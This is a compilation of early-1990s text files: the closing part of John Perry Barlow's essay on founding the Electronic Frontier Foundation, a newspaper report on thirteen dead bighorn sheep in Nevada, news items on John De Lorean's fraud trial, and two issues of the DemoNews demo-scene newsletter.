distinguished constitutional law firm, Rabinowitz, Boudin, Standard, 
Krinsky, and Lieberman.  These are the folks who made it possible 
for the New York Times to print the Pentagon Papers.  (Not to dwell 
on the unwilling notoriety which partner Leonard Boudin achieved 
back in 1970 when his Weathergirl daughter blew up the family 
home...)

In the conference call which followed, I could almost hear the skeletal 
click as their jaws dropped.  The next day, Eric Lieberman and Terry 
Gross of Rabinowitz, Boudin met with Acid Phreak, Phiber Optik, 
and Scorpion.

The maddening trouble with writing this account is that Whole Earth 
Review, unlike, say, Phrack, doesn't publish instantaneously.  Events 
are boiling up at such a frothy pace that anything I say about current 
occurrences surely will not obtain by the time you read this.  The 
road from here is certain to fork many times.  The printed version of 
this will seem downright quaint before it's dry.

But as of today (in early June of 1990), Mitch and I are legally 
constituting the Electronic Frontier Foundation, a two (or possibly 
three) man organization which will raise and disburse funds for 
education, lobbying, and litigation in the areas relating to digital 
speech and the extension of the Constitution into Cyberspace.

Already, on the strength of preliminary stories about our efforts in 
the Washington Post and the New York Times, Mitch has received an 
offer from Steve Wozniak to match whatever funds he dedicates to 
this effort.  (As well as a fair amount of abuse from the more 
institutionalized precincts of the computer industry.)

The Electronic Frontier Foundation will fund, conduct, and support 
legal efforts to demonstrate that the Secret Service has exercised prior 
restraint on publications, limited free speech, conducted improper 
seizure of equipment and data, used undue force, and generally 
conducted itself in a fashion which is arbitrary, oppressive, and 
unconstitutional. 

In addition, we will work with the Computer Professionals for Social 
Responsibility and other organizations to convey to both the public 
and the policy-makers metaphors which will illuminate the more 
general stake in liberating Cyberspace.  

Not everyone will agree.  Crackers are, after all, generally beyond 
public sympathy.  Actions on their behalf are not going to be popular 
no matter who else might benefit from them in the long run.  

Nevertheless, in the litigations and political debates which are certain 
to follow, we will endeavor to assure that their electronic speech is 
protected as certainly as any opinions which are printed or, for that 
matter, screamed.  We will make an effort to clarify issues 
surrounding the distribution of intellectual property.  And we will 
help to create for America a future which is as blessed by the Bill of 
Rights as its past has been.

     
     

John Perry Barlow
barlow@well.sf.ca.us
Friday, June 8, 1990  


   Reprint of an article taken from the Las Vegas Review-Journal/Sun,
Sunday, Nov 24, 1991

                   Bighorn Sheep Massacre A Mystery
                           by Keith Rogers

           Wildlike officials are at loss to explain how or
           why 13 carcasses were flown to charred landscape.


   It sounds like a segment from "Unsolved Mysteries."

   On a chilly November day last year, hunter Jack Anderson climbed the
rocky terrain of a peak near Carp, a Union Pacific railroad stop in Meadow
Valley Wash at the foot of the Morman Mountains, 65 miles northeast of Las
Vegas.

   There, to his disbelief, he found 13 dead desert bighorn sheep, most of
them piled atop the charred landscape where desert shrubs and a few,
scattered pinyon pines and junipers once grew until a fire wiped them out.

   The sight of the dead bighorns, with no burn marks on their bodies,
bothered him.

   "For whatever reason it was done, it wasn't right," Anderson said last
week.

   Wildlife officials estimate the carcasses had been there at least six or
eight months, maybe longer, perhaps a year or more, given the dry and shady
location.  They were mostly ewes and lambs but two of them were rams.  None
had evidence of bullet wounds.  All had died about the same time.

   The carcasses had apparently been dropped out of the air because the
hill was too steep and treacherous for a human to haul them there by foot
or even on horseback, and there is no way of reaching the area by vehicle.

   "It would take six hours if you could walk fast.  It's steep, 5,000 to
6,000" feet in elevation, Anderson said, recounting how he took warden
Barry Adkins to the spot.

   Adkins quietly investigated the dead sheep until April, when he appealed
to the Las Vegas news media to help solve the mystery.  Despite news
stories and broadcasts, no leads surfaced.

   A year since Anderson found the bighorn, Adkins is still looking for
answers.

   "Nothing has come up substantial," Adkins said this month.  "They were
probably killed someplace else and dumped there.  Somebody tried to cover
up the act."

   Theories on who or what killed the sheep range from outer space aliens
to sadistic cults to mishaps involving live capture operations.  Other
possibilities are an accidental poisoning or a botched Air Force operation.

   Whatever happened, Adkins and other state wildlife investigators are
convinced a helicopter was involved because of the positioning of the
carcasses, most of them in pile, 12 feet from the top of the hill, with a
few scattered as if they had slid downhill.

   One dismembered carcass had been dragged from the pile by a predator,
probably a cougar or coyote, he said.

   Adkins and state wildlife biologist Bob Turner said they doubt scenarios
that involve aliens or sadistic cults, because 12 of the sheep were found
whole.

   Adkins said he investigated the possibility that the sheep fell victim
to  a state-sanctioned relocation operation that used a net shot from a
helicopter as the aircraft chased them into a clearing.  But the numbers
didn't add up.

   One of two so-called net-gunning missions occured in the Morman
Mountains about the time the sheep were believed to have died.  They were
performed by an Idaho helicopter company for the Texas Parks and Wildlife
Department under an agreement with the Nevada Department of Wildlife.  But
mortality figures recorded by state biologists fall short of the number of
sheep that Anderson found dead.

   Turner said in all there have been 10 net-gunnings to capture some 240
bighorns since the mid-1980s.

   Only five sheep died in those operations that sent 50 to Texas, 30 to
Utah and 28 to Colorado, and relocated the rest to restore other desert
bighorn populations in Nevada.  A few net-gunnings have occured in Oregon
and Idaho to bring sheep to Nevada.

   Turner's records show that in the two Texas captures only one sheep
died, probably from a broken neck after it tangled in net the and rolled.

   Despite the four deaths from net-gunning, the American Veterinary
Medical Association reported this month that wild sheep populations have
benefited from relocation projects, and better capturing methods have
reduced the mortality rate from more than 10 percent in the 1970s to 3
percent in the 1980s to 1 percent this decade.

   Turner's figures show Nevada's sheep mortality rate is about the same as
the national average.

   Adkins rejected a theory that another state hired a helicopter to
conduct an unauthorized capture of Navada sheep, causing the 13 deaths.

   "Anything is possible," he said.  "If it was another state, though, I
don't think they would have gone to the trouble to dump them."

   Adkins said he checked other agencies that use helicopters in the area
of the Morman Mountains.  He said he figured some might have been used for
a military mission involving a txic gas or spray.

   But Air Force military police told him no military activity occurred
there during the time the sheep died.  A second check of activity reports
by a spokesman at Nellis Air Force Base confirmrd no Air Force missions
were conducted at that time near Carp, the Morman Mountains or Morman Peak.

   Adkins said he did not contact the Department of Energy, which often
uses helicopters to patrol the Navada Test Site, some 80 miles to the west.
"We felt we covered that base by (contacting) the military.  DOE is not in
the area."

   As for a cult, Adkins said, "I don't think a satanic cult would have
access to one group (of sheep).  It seemed like the whole group dropped
dead."

   That leaves the possibility that fire crews trying to douse a blaze in
the area contaminated a drinking water supply with fire retardant
chemicals.  At low concentrations, the retardant is supposed to be
biodegradable and of no risk to wildlife.

   The sheep were found one mile east of the state's Bertha wild game water
development - a 30,000 gallon, plastic-lined water tank that catches runoff
from surrounding hills through a series of pipes.

   Turner explained that slurries of the fire retardant, Phoschex, are
sometimes mixed using water supplies that are near fires.  Helicopters or
air tankers are used to drop the slurries.

   Phoschex is the brand name for the compound diammonium phosphate,
produced by the Monsanto Co. in southern California.  It is sometimes
colored witha dye so pilots can tell where it has been dropped.  It washes
out in rain and sometimes takes 14 days to dissolve completely, according
to Bureau of Land Management fire chief Gary Pavusko.

   In the early 1980s, wildlife officials suspected fire retardants might
have played a role in the deaths of 150 desert bighorns in the Morman
Mountains.  "Sheep skulls were laying all around.  We think they died of
pneumonia," Turner said.

   But Pavusko said, "We solved this four years ago.  The Monsanto people
proved there was no problem with the bighorn sheep habitat, and we didn't
receive a letter from NDOW (Nevada Department of Wildlife) to stop using
it."

   Pavusko did say Phoschex has been used to fight fires in the Morman
Mountains, the last time six years ago.  A soaplike, environmentally
compatible foam is sometimes used in steep terrain, he said.

   But, to his knowledge, Phoschex has never been mixed at the Bertha water
supply.

   "We do not drop it in riparian areas that have streams.  It would take
the oxygen out of the streams, thus killing fish," he said.

   Pavusko said there are typically five or six fires a year in the Morman
Mountains.  They are usually caused by lightning.

   Last year, there were "three or four" small fires - about a half acre
each - caused by lightning in that area, he said.  Helicopter crews
responded and put them out with hand tools.

   "I've never run across dead sheep on a fire," he said.

   Meanwhile, wildlife officials are still trying to solve the dead sheep
mystery.  Anyone with information that could help authorities should call
1-800-992-3030.  THe information will be kept confidential.


 The De Lorean Case
 
    ...typed for you by The Cruiser

--------------------------------------------------------------------------------

De Lorean case will go to jury

 
  Former sports car maker John Z. De Lorean's fraud and racketeering trial
moved with the speed of a Model-T Ford down a rutted country lane until 
his lawyer last week called a single witness and rested the defense.

  After closing arguments, scheduled for today in Detroit, U.S. District 
Judge Julian A. Cook Jr. was to order jurors to decide whether the former 
General Motors Corp. vice president illegally siphoned $8.5 million of 
investors' money from his sports car company before it failed.
  
  The only defense witness called was an FBI agent who sat at the prosecutors'
table throughout the trial.  De Lorean's lawyer, Howard Weitzman, grilled 
agent Richard Eggleston for three days last week, his questioning punctuated
by numerous objections from prosecutors.

  The government had spent five weeks presenting its case, including 27 
witnesses and 4,000 pages of documents.

  De Lorean, a former star executive at GM who parlayed life in the fast lane
into a car company all his own, did not testify.  A 15-count federal indictment
last year charged De Lorean, 61, with stealing the $8.5 million from
De Lorean Research Limited Partnership.

  				...
				. .
				...


Thursday, December 18, 1986

		De Lorean found innocent

Jury clears maker of defunct sports car of racketeering, fraud

DETROIT - Former carmaker John De Lorean, accused of stealing millions of 
dollars from investors in his defunct sports car business, was found innocent
yesterday of all charges of racketeering and fraud. 
 
  On the sixth day of jury deliberations, the former General Motors executive
proclaimed "Praise God" and embraced his defense lawyers when the verdict was
read in the U.S. District Court.

  De Lorean, 61, in 1984 was acquitted of cocaine conspiracy charges after a
sensational trial in Los Angeles.  He had been accused of stealing at least
$8.5 million from 140 investors in his car company, which briefly built 
gull-winged cars in Northern Ireland.
  De Lorean, who has said he intended to announce a new car venture if cleared,
shook his head in relief and wiped tears from his eyes as the jury foreman
responded "not guilty" for 15 findings.
  The silver-haired De Lorean, who was indicted in September 1985 on charges
that he stole investors' money through an elaborate scheme involving money
transfers between European and U.S. banks and corporations, was defended by
flamboyant Los Angeles lawyer Howard Wietzman, who won the businessman's
acquittal on the drug charges. 

  Yesterday's verdict would appear to end the governmant's criminal case 
against him, but De Lorean is still fighting claims by creditors, including
the British government.
 
  London and other creditors have frozen about $20 million of De Lorean's 
assets in bankruptcy proceedings in Detroit, which are expected to resume 
Jan. 21.

  As in the Los Angeles trial, De Lorean was found innocent without taking the
stand in his own defense.

  In the 10-week trial, the government presented a stream of former De Lorean
associates from the United States and Europe.  The government hoped to support
its contention that De Lorean masterminded an elaborate scheme to syphon
investors' money under the guise of a purported loan that the prosecution said
was a fraud.
  
  De Lorean's defense argued that the $8.5 million in question was recieved
as part of a legitimate loan.  Weitzman said the loan came from Colin Chapman,
the deceased founder of the British auto group Lotus, which did engineering on
the De Lorean car.

  Weitzman told jurors in his closing argument eight days ago that the 
government has persecuted his client.  

  Had he been convicted on all counts, De Lorean would have faced maximum
sentences of up to 87 years in prison and fines of up to $82,000.


-Start-of-Demo-News-#67-------------------------------------------------------
              ___________  _________________ ____  ____________
              \_______   \/    __________   |    \ \________   \
              _____ \_    \    __)___/            \/    \__/    \
            _/     \_/     \         \_    :_:     \_            \_
            \______________/__________/____| :______/_____________/

                   October 23, 1994 - ISSUE #67 - October 29, 1994
                _________  _______________ ___ ___  ______________
               /    _    \/    __________ |   |   \/  ___________/
              /     |     \    __)___/    :   :    \_______    \
            _/      |      \_        \_     _       \_    |     \_
            \_______|_______/_________/_____|________/___________/

==============================================================================
((CONTENTS))
==============================================================================

                 Section  1..............Standard Information
                 Section  2...........................General
                 Section  3.............................Files
                 Section  4.............................Music
                 Section  5..............................Code
                 Section  6...........................Demo CD
                 Section  7....................Advertisements
                 Section  8..................Top 25 Downloads
                 Section  9..............................Misc
                 Section 10...........................Closing

==============================================================================
((Section 1...Standard Info))
==============================================================================
    DemoNews is a weekly publication dedicated to the demo scene.  It is
produced at the Internet FTP site ftp.eng.ufl.edu (aka WASP or HORNET).
This newsletter focuses on all aspects of demos and demo-making (including
music, art, and coding).  ALL are welcomed to contribute articles, rumors,
adverts, etc.

There are currently four active demo-operators at this site:

     Dan Wright (Pallbearer)       - GENERAL - dmw@eng.ufl.edu
     Christopher G. Mann (Snowman) - GENERAL - r3cgm@dax.cc.uakron.edu
     Mike                          - GENERAL - weis@elf.stuba.sk
     Jason (Cavalier)              - ANSI    -  cavalier@shadow.net

    This site is mirrored by the following ftps:
         ftp.uwp.edu
         ftp.luth.se  --> DOWN lately due to hard drive problem.
         ftp.sun.ac.za
         ftp.uni-erlangen.de
         ftp.uni-paderborn.de
         ftp.cdrom.com

SUBSCRIPTIONS TO THIS "NEWSLETTER" can be obtained by mailing:

listserver@oliver.sun.ac.za

and putting "subscribe demuan-list your_real_name" in your message.
The listserver is what sends out this newsletter every SUNDAY morning.
kimba@it.com.au is the keeper of the listserver.

For those who use the GUI environment check out our DN.HMTL in the
/demos/news directory.  The URL is ftp://ftp.eng.ufl.edu/demos/news/DN.HTML
If anyone wants to do a graphic logo for this please get in touch.

==============================================================================
((Section 2...General))
==============================================================================
(SOME PEOPLE CAN HELP OUT)
------------------------------------------------------------------------------

Here is a list of people who have offered to help out with HORNET once Dan
leaves:

             Andrew Younger         - aiy@mundil.cs.mu.OZ.AU
             Brenton Swart (Zenith) - bswa1595@pilot.stu.cowan.edu.au
             Ryan Cramer            - rcramer1@mason1.gmu.edu
             Styros (John Way)      - iq23@jove.acs.unt.edu

I will write these people soon regarding their respective duties.

[If you want to help out you then contact SNOWMAN--address above.  Basically
you would help fill the void when I leave and get the site back into shape--
there are LINKS off and files need move, etc.]

------------------------------------------------------------------------------
(HELP)
------------------------------------------------------------------------------

I am receiving too much mail.  This will not get better when I am the head
administrator here.  As a result, I will be forwarding some of the general
mail I receive to Ryan Cramer.

DELETED
  -!!VIRUS!!-        3dvect38.zip

We try to keep this site VIRUS free however we do not scan all files so
be cautious. If you find something please let us know or put a message
in the incoming directory of ftp.eng.ufl.edu (/demos/incoming).

==============================================================================
((Section 3...Files))
==============================================================================
Filename.ext  Location               Description
------------------------------------------------------------------------------

-----------.
| --DEMOS-- |    (all locations start with /pub/msdos/demos...)
`-----------'
asc2demo.zip  DELETED         Too slow...and not really a demo at all.
genesis.zip   DELETED         Texture mapping..no demo..VERY slow generation.
rr-beast.zip  /alpha/NEW      Rash Reflections--The BEAST Project. GUS.
y_hyy.zip     /alpha/NEW      Symptoms Hyytelo intro. GUS.

-----------.
| --MUSIC-- |    (all locations start with /pub/msdos/demos/music...)
`-----------'
overcome.lzh  /songs/mod             Overcome by Pizza Dude
tdm_fonk.lzh  /songs/mod             Fonkey One by TDM
tl-forth.lzh  /songs/mod             The Forthcoming by Timelord
valiant .lzh  /songs/mod             Valiant by Pizza Dude
chiascur.lzh  /songs/s3m             Chiaroscuro by Vision Thing
inca    .lzh  /songs/s3m             Dream of the Inca by Vision Thing
jupiter .zip  /songs/s3m             Jupiter by tR/\Sh
pro-loop.zip  /songs/s3m             Pro-Loop by Elliott Lee
pushahed.lzh  /songs/s3m             Pushing Ahead by Pizza Dude
sing2sky.lzh  /songs/s3m             Singing To the Sky Again by Vision Thing
travmind.lzh  /songs/s3m             The Travelling Mind by Vision Thing
withbmit.zip  /songs/s3m             NIN Wish Remix by the Bedlamite
worldtec.lzh  /songs/s3m             World Internet Technologies/Vision Thing

DELETED
  -corrupt-          n-f_murd.arj
  -no description-   9innails.zip  blue_jim.zip  earthqke.zip  goodtime.zip
  -cleanout-         220v    .zip  dl_s3m  .zip  dontyou .zip  faktor  .zip
                     firstime.zip  likelost.zip  heresy  .zip  kanon2-1.zip
                     no-cc   .zip  no-ryan .zip  outof   .zip  pleasant.zip
                     sadman  .zip  void    .zip

--------------.
| --ART/ANSI-- | (all locations start with /pub/msdos/demos/...)
`--------------'

We have an ANSI maintainer--cavalier@shadow.net.  He usually posts his
comments within the "/incoming/ansi" directory.

----------.
| --CODE-- |  (all locations start either /demos/programming or /demos/code)
`----------'
The /programming directory will be reorganized and slowly moved to the /code
directory by me, Snowman.

as      .lzh  /code/demosrc          ASM code from Amnesia's VR section (Tran)
birthsrc.lzh  /code/demosrc          A birthday card ASM source (nice dots)
bits93  .lzh  /code/demosrc          Bits93 ASM source (lens and scroller)
bkisssrc.zip  /code/demosrc          Bytes and Kisses ASM source
byte-src.zip  /code/demosrc          The Byte Before X-Mas source (ASM)
cool    .lzh  /code/demosrc          ASM source for a small BBS ad
fcdemoex.lzh  /code/demosrc          C source to extract data files FC demos
gallery .zip  /code/demosrc          Art Gallery ASM source from Inconixia
hell    .lzh  /code/demosrc          ASM source code from Tran's Hell demo
timesrc .zip  /code/demosrc          Timeless Screen Saver ASM source (Tran)
3dscape .lzh  /code/graph/3d         ASM/C source for a point landscape
3dvect37.zip  /code/graph/3d         3D ASM Vector Engine (very extensive)
ackkit  .lzh  /code/graph/3d         Demo of acksrc.lzh (see below)
acksrc  .lzh  /code/graph/3d         Wolfenstien-type ray-casting ASM/C source
bars    .lzh  /code/graph/copper     ASM source for copper bars (2 methods)
firecode.lzh  /code/graph/fire       Fire source code in C, ASM, and Pascal.
flames2 .lzh  /code/graph/fire       Some more fire code in ASM
flag    .lzh  /code/graph/flag       Really cool! ASM code for blowing flag.
decpcx  .lzh  /code/graph/images     A PCX decoder in ASM
gif2lbm .lzh  /code/graph/images     C source code to convert a GIF to an LBM
rfvdemo .zip  /code/graph/library    C++ source for:fractal zoom, voxel, etc.
fpoly256.lzh  /code/graph/vector     ASM/C source to draw polygons
gsrc211 .lzh  /code/sound            ASM source code to GUSMOD v2.11

----------.
| --MISC-- |     (all locations start with /pub/msdos/demos/...)
`----------'

acme-cl2.zip     /groups/acme       ACME mini music disk.
imp8.zip         /diskmags          Imphobia 8. Great diskmag..but same
                                    buggy interface with only GUS 220 support.
jihadapp.zip     DELETED            Application for an ART group.
tplas20.zip      DELETED            Screen Saver and shareware.
vtimer10.zip     /programming/utils For timing video card...
yahoo03.lzh      /diskmags          Topaz Beer Line demo diskmag. Good.

==============================================================================
((Section 4...Music Articles by Snowman))
==============================================================================
(GENERAL)
------------------------------------------------------------------------------

Well, not too much of note this week.  Almost all of the uploads were either
S3Ms or MODs.  We still have 20 megs free, so you are safe in that respect.

Royal, Stony, Matt Heck, and myself are still working on the Escape intro.  It
should be released next weekend if everything goes well.

I would like to plug Trixter's Chromatics 2 which will be released before too
long.

------------------------------------------------------------------------------
(MUSIC CONTEST ][ RESPONSE)
------------------------------------------------------------------------------

[From rwhunt@rs6000.cmp.ilstu.edu Sun Oct 16 03:42:11 1994]

  Normally, I would have just watched as the post-MC2 rumblings died down and
  just kind of remembered the entire event as an interesting segment in my
  life.  But after reading the most recent demonews, I was rather shocked at
  the number of people who actually thought the judging was totally fair.

  To relate my personal experience in the best light possible, I would have to
  say that I stood absolutely no chance of getting a fair judging. I learned
  first-hand who a couple of the people who judged my song were before the
  contest was over, and let me just say that I was incredibly depressed.
  These individuals basically told me that they would make sure I came in as
  low a place as I could.

  Other than these two particular judges, I have had no particularly negative
  comments regarding the song, and in fact, one person who had previously told
  me I was no good said that I had 'vastly improved'. Go figure, eh? Oh well.
  I did still enjoy the contest, it's just a shame that I (as well as several
  other people, V-ANTHEM in particular) were not given a truly fair shot. I'm
  not sure what I expect you to do with this letter, but I guess it could go
  in next month's demonews as kind of a reaction ;)

[From rwhunt@rs6000.cmp.ilstu.edu Sun Oct 16 18:37:26 1994,
 with quoted text from my reply to the above letter]

> This does bring up an interesting point, one that I have thought about
> in the past but have had a difficult time dealing with.  If someone like
> Skaven enters a really shitty song, are they still guarenteed top 5 just
> because they are Skaven?  I had briefly considered making all entries to
> MC][ anonymous, but the extra workload involved would be rather
> substantial.

  That was one of the main points that came up while I went over this topic
  in my head, although it usually ended up being more like 'if someone who
  was extremely hated in the demo community entered an incredible song, would
  they truly mark fairly?'.

> One way to have each song anonymous would be to have each individual
> musician send their song to me.  I would then write down who wrote it,
> and upload it without a name.  If you think about this for a moment
> though, it is rather unlikely that this would work.
>
> First, people usually have descriptive text in the sample box.  They
> couldn't greet anyone, and couldn't say who they were.  Second, some
> people (like Krystall, Skaven, Khyron) have a very specific style and
> you can tell who wrote the tune without even reading their name.

  Yes, I've been thinking about a good way to do anonymous judging and such
  for the past month, since my group and a few others are planning a music
  contest whose entire idea is totally anonymous judging. It wouldn't be
  terrifically hard for myself or anyone in my area, as I could have about
  half of my group at my house (the other half is in Canada or Texas, and I
  don't think it'd be worth it :>) and use DMP with the no screen mode to
  judge the song, and then see who wrote it.

  I'm not particularly sure who the other judges would be, however. It would
  be obvious that having public judges would ruin the chances of getting a
  truly fair judging. Yes, the style does say something, but I know that even
  people such as Purple Motion, whose style I can basically idenfity in a
  second, have written songs which conflict with their usual stuff, so luckily
  the possibility is decreased slightly through that option.

> Well, I'll take your point under consideration and see what I can do
> with it for MC]I[.  Thanks for your input.

  No problem. I'm glad there's going to be an MC]I[. :) (this time, I'll be
  sure to be a judge myself and keep careful track of [omitted])

[Lloyd.Yoon : Thu Oct 20 06:05:05 1994]

  First, I'd like to thank you for hosting the two MC's, it's been a fun
  experience, but I do have a couple of suggestions.  First off, I think
  the judging system needs to be dumped.  It is more complex than it
  should be, and strange results came out.  There should be no judgement
  on form, technical, or samples.  The way I personally think it should
  be judged is using a 1-10 system, for the overall song.

  A song should win because it is enjoyable and motivating to listen to.
  In the present system, a song which may be more boring but has good chord
  structure and samples etc can beat a song which simply is more pleasing
  to the ear.  Samples should not need to be judged, because if they sound
  good in thesong, that should be good enough.  If they do not fit in the
  song, the overally enjoyment will decrease, hence, the score will too.  A
  song should not be penalized for samples that contain slight static or
  imperfections that are not noticable during the actual playing of the
  module.  If it is not terribly noticable, WHO CARES?  The song still
  sounds good!  Same goes with all of the other aspects of judging.

  If it is not original, it will not be enjoyable.  If it is a technical
  mess, it will give you an earache, which in turn would lower the
  impression the song leaves behind.  It is a less painstaking algorithm
  that will make the songs that people like the winners.
  I sincerely hope that you will take this idea into consideration.


==============================================================================
((Section 5...Code Articles by Snowman))
==============================================================================
(GENERAL)
------------------------------------------------------------------------------

Well, I don't have much in the way of coding news to report, so I think I'll
have a mini-contest:

                                 /------------\
                                | EMOTICON 94' |
                                 \------------/

Problem:  Having a :) at the end of parenthesis really looks confusing.
Example:  This is an odd contest (like I don't know that already :))

As you can tell, the double "))" looks rather odd, and detracts from the value
of the smily face (also known as an emoticon :)).

What is your solution??

I will post the best 5 answers I receive in next week's issue.

==============================================================================
((Section 6...ESCAPE Demo/Music CD))
==============================================================================

Check /pub/msdos/demos/incoming/democd for UPDATES and information.
And YES, I do occasionally update this directory.

I will include some information--maybe all or similar to what will be
mailed out to those on my contact list--with the ESCAPE intro coming out
next week.  Most of you know the structure, 209megs/47mins, cost $10-$13,
and tentative release date (November) already.

Much of the ASM'94 stuff (intros/demos) will be included on the CD--which
reminds me, I wonder when the ASM'94 CD will be out?  Does anyone know?
Hopefully they--the producers of the ASM'94 CD--will not harass us.  If
they do you WILL here about it here...and believe you me (HANS & FRANS) I
will not leave out any details.  Heck...ESCAPE is a part of the scene.

==============================================================================
((Section 7...Advertisements))
==============================================================================

Subject: Revolutions...
From: Daniel_Snyder@mindlink.bc.ca (AEC Software)

Hey there, I'm sure you've heard of our diskmag "Revolutions" right???

  REVOLUTiONS iSSUE #1
  VOTiNG FORM

[I got too eager in my deletion that I deleted all the important info from
this would be article.  You can download the file from the /groups/immortal
directory.  It is called rev-vote1.zip.  This diskmag is due out in Dec '94
and still could use a few articles from people out there.]

==============================================================================
((Section 8...Top 25 Downloads))
==============================================================================

Not this week.  When the sys admin gets it fixed you will KNOW...we've had
our "C" program ready to roll out the statistics for months.

==============================================================================
((Section 9...Misc))
==============================================================================

>From weis@elf.stuba.sk Tue Oct 18 20:18:37 1994
--------------------------------------------------------------------------
Mike
++++

->I've decided to make several changes in demo-review file, known as DEMOS.TXT
  At first, second window was changed a little, a text "Music/Sound" is now
  reduced to "Music", so there is more space for sound-card configuration,
  and, a new sign can be seen now right after keyword Music (something like
  this one):
+-------+-----------------------------+ +----------+--------------------------+
| Demo  | 2NDREAL (Second Reality)    | | Graphics | 10                       |
| Group | Future Crew                 | | Music )( | 10  GUS/SB(pro)          |
| Size  | 2,496,721                   | | Coding   | 10                       |
| Date  | October 9, 1993             | | Overall  | 10.0                     |
+-------+-----------------------------+ +----------+--------------------------+
  Sign ")(" stands for Double-D, a dolby identification. In this case
  it displays demos with "Dolby Surround Pro Logic" sound support. I mean
  REAL 3D sound support, not just simply inverted one mono channel - I don't
  call that a "surround"!
  Now there is a quest for all of you: I don't have a surround decoder (at
  least for now ;) so, if you know demos that support a surround sound, write
  name of demo to: dmw@wasp.eng.ufl.edu


->Another one change is done in marking of "age" of entries:

|*Demo  | NEW_ENTRY                   | | Graphics | X                        |

  This one means that this is a new entry in this edition of DEMOS.TXT.
  In next edition, all '*' marked demos are chaned to '.' demos:

|.Demo  | OLDER_ENTRY                 | | Graphics | X                        |

  And '.' entries are marked as a regular demos.

->And the last one: now there are 501 demos in list! And still growing ;)
  I believe there'll be more than 1000 entries until May'95...
-----------------------------------------------------------------------------


c u,
 ___  _____ _ _  ____  __  __ _   _____ ____ _______________________________
|    (  ___/ | \|    \|  |/__|_| (  ___/  __\   |         -= Infi =-        |
|   __\ \ /  \__ \ \  \   / |  |__\ \ /  __/_   |  weis@decef.elf.stuba.sk  |
|_ |_____)\______/_||__|_|  |__|_____)\______\ _|___________________________|

==============================================================================
((Section 10...Closing))
==============================================================================

Next week...the Halloween special edition...BOO!  We welcome related (scary)
submissions.

Stay at Large,

dmw@eng.ufl.edu
---------------------------------------------------------End-of-Demo-News-#67-

-Start-of-Demo-News-#68-------------------------------------------------------
              ___________  _________________ ____  ____________
              \_______   \/    __________   |    \ \________   \
              _____ \_    \    __)___/            \/    \__/    \
            _/     \_/     \         \_    :_:     \_            \_
            \______________/__________/____| :______/_____________/

                   October 30, 1994 - ISSUE #68 - November 5, 1994
                _________  _______________ ___ ___  ______________
               /    _    \/    __________ |   |   \/  ___________/
              /     |     \    __)___/    :   :    \_______    \
            _/      |      \_        \_     _       \_    |     \_
            \_______|_______/_________/_____|________/___________/

==============================================================================
((CONTENTS))
==============================================================================

                 Section  1..............Standard Information
                 Section  2...........................General
                 Section  3.............................Files
                 Section  4.............................Music
                 Section  5..............................Code
                 Section  6...........................Demo CD
                 Section  7....................Advertisements
                 Section  8..................Top 25 Downloads
                 Section  9..............................Misc
                 Section 10...........................Closing

==============================================================================
((Section 1...Standard Info))
==============================================================================
    DemoNews is a weekly publication dedicated to the demo scene.  It is
produced at the Internet FTP site ftp.eng.ufl.edu (aka WASP or HORNET).
This newsletter focuses on all aspects of demos and demo-making (including
music, art, and coding).  ALL are welcomed to contribute articles, rumors,
adverts, etc.

There are currently four active demo-operators at this site:

     Dan Wright (Pallbearer)       - GENERAL - dmw@eng.ufl.edu
     Christopher G. Mann (Snowman) - GENERAL - r3cgm@dax.cc.uakron.edu
     Mike                          - GENERAL - weis@elf.stuba.sk
     Jason (Cavalier)              - ANSI    -  cavalier@shadow.net

    This site is mirrored by the following ftps:
         ftp.uwp.edu
         ftp.luth.se  --> DOWN lately due to hard drive problem.
         ftp.sun.ac.za
         ftp.uni-erlangen.de
         ftp.uni-paderborn.de
         ftp.cdrom.com

SUBSCRIPTIONS TO THIS "NEWSLETTER" can be obtained by mailing:

listserver@oliver.sun.ac.za

and putting "subscribe demuan-list your_real_name" in your message.
The listserver is what sends out this newsletter every SUNDAY morning.
kimba@it.com.au is the keeper of the listserver.

For those who use the GUI environment check out our DN.HMTL in the
/demos/news directory.  The URL is ftp://ftp.eng.ufl.edu/demos/news/DN.HTML
If anyone wants to do a graphic logo for this please get in touch.

==============================================================================
((Section 2...General))
==============================================================================
(SOME PEOPLE CAN HELP OUT)
------------------------------------------------------------------------------

Here is a list of people who have offered to help out with HORNET once Dan
leaves:

             Andrew Younger         - aiy@mundil.cs.mu.OZ.AU
             Brenton Swart (Zenith) - bswa1595@pilot.stu.cowan.edu.au
             Ryan Cramer            - rcramer1@mason1.gmu.edu
             Styros (John Way)      - iq23@jove.acs.unt.edu

I will write these people soon regarding their respective duties.

LINKS

Many of the "links" under the /groups directories were updated this
weekend--i.e. many music links deleted.  So, if you have a dir under
the /groups structure and some demos are not linked please let us know
and we will try to fix/update your link.

FALL BACK

Welp, this is the last weekend in October and everyone knows what that
means...right?  Yep, it is time to set our clocks back.  I wonder if they
do this in other parts of the world or only here in the US of A?  It is
called Daylight Savings time...it begins in the SPRING and ends in the FALL
right before Halloween.  Now it will be LIGHTER in the morning and DARKER
in the Evening...basically less LIGHT during what many would call the "DAY."
I always like to kid that I am going to "save" my hour for a later date--
instead of just sleeping it away....like for an EXAM...but, since I no longer
attend school/college I'll just sleep it away.

==============================================================================
((Section 3...Files))
==============================================================================
Filename.ext  Location               Description
------------------------------------------------------------------------------

-----------.
| --DEMOS-- |    (all locations start with /pub/msdos/demos...)
`-----------'

acme-pe.zip   /alpha/NEW      Acme's PLANET EARTH BBS intro. GUS
edosbbs.zip   /alpha/NEW      EDO's BBS intro by Genuine. GUS
ht2work.arj   /alpha/NEW      Mini intro by Hi-Tech Designs of Ispania.
miopia.zip    /alpha/NEW      The Rising Sun Teams 1st demo. GUS/SB.

-----------.
| --MUSIC-- |    (all locations start with /pub/msdos/demos/music...)
`-----------'
ambipak3.zip  /disks                 Ambi Music Pack 3
emotion1.zip  /disks                 Emotion Music Disk [1/2]
emotion2.zip  /disks                 Emotion Music Disk [2/2]
gas_gbr1.zip  /disks                 GBR Musicdisk 1
crys-klf.zip  /klf                   Crystalline Tears by Nemesis
fric-klf.zip  /klf                   Friction by Mental Floss
shea-klf.zip  /klf                   Shearing...Universe Within by Maelcum
is-smp1 .zip* /programs/misc         Immortal Syndicate SAMPLE Library #1
timesam1.zip* /programs/misc         Time sample pack #1 fx/synth/voice samps
cmod201 .zip  /programs/players      Capa Mod v2.01 (now with S3M support!)
m4w211sx.zip  /programs/players      MOD 4 Windows version 2.11
starp100.zip  /programs/players      Star Player (plays S3Ms on GUS)
m3rip130.zip  /programs/rippers      M3RIP (Extracts modules from demos)
ft3-bbs .zip  /programs/trackers     Information on Future Tracker
